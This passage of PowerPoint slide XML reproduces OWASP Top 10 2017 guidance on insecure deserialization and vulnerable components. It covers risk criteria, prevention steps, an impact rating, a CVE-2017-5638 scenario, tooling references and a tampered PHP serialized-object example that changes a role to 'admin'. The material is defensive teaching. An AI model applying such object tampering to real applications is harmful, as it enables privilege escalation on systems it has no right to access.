                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</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Insecure Deserialization?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Distributed applications or those that need to store state on clients or the filesystem may be using object serialization. Distributed applications with public listeners or applications that rely on the client maintaining state, are likely to allow for tampering of serialized data. This attack is possible with binary formats like Java Serialization or text based formats like JSON. Applications and APIs will be vulnerable if the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serialization mechanism allows for the creation of arbitrary data types, AND</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There are classes available to the application that can be chained together to change application behavior during or after deserialization, or unintended content can be used to influence application behavior, AND</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The application or API accepts and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hostile objects supplied by an attacker, or an application uses serialized opaque client side state without appropriate tamper resistant controls. OR</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Security state sent to an untrusted client without some form of integrity control is likely vulnerable to deserialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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1"/>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1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</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Deserialization Cheat Sheet</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 Validate All Inputs</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6"/>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7"/>
              </a:rPr>
              <a:t>OWASP AppSecEU 2016: Surviving the Java Deserialization Apocalypse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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AU" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> 2017: Friday the 13th JSON Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId9"/>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endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId1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CWE-502 Deserialization of Untrusted Data</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https://github.com/mbechler/marshalsec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If that is not possible</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Implement integrity checks or encryption of the serialized objects to prevent hostile object creation or data tampering</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Enforce strict type constraints during deserialization before object creation; typically code is expecting a definable set of classes. Bypasses to this technique have been demonstrated.</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Isolate code that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such that it runs in very low privilege environments.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Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</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Restrict or monitor incoming and outgoing network connectivity from containers or servers that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">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Monitor deserialization, alerting if a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> constantly.</a:t>
            </a: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281511269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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial"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a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence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baseline="0">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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitation of deserialization is somewhat difficult, as off the shelf exploits rarely work without changes or tweaks to the underlying exploit code. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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3"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and not on quantifiable data.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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The impact of deserialization flaws cannot be understated. They can lead to remote code execution attacks, one of the most serious attacks possible.</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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are frequently difficult or impossible to patch, the importance of patching them can be great (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eg</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6"/>
              </a:rPr>
              <a:t>St. Jude pacemakers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</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There are automated tools to help attackers find unpatched or misconfigured systems. For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Known Vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You are likely vulnerable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you do not know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, APIs and all components, runtime environments and libraries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you do not know if they are vulnerable. Either if you don’t research for this information or if you don’t scan them for vulnerabilities on a regular base.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you do not fix 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 This is likely the root cause of one of the largest breaches of all time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you do not secure the components' configurations (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900"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r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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OWASP Application Security Verification Standard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Dependency Check (for Java and .NET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Virtual Patching Best Practices</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1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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The Unfortunate Reality of Insecure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MITRE Common Vulnerabilities and Exposures (CVE) search</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4"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</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5"/>
              </a:rPr>
              <a:t>Retire.js for detecting known vulnerable JavaScript libraries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6"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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7"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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inventory the versions of both client-side and server-side components and their dependencies using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>versions</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0"/>
              </a:rPr>
              <a:t>DependencyCheck</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15"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for vulnerabilities in your components. Use software composition analysis tools to automate the process.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Many libraries and component do not create security patches for out of support or old versions, or it simply be unmaintained. If patching is not possible, consider deploying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to monitor, detect or protect against the discovered issue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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a:t>Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
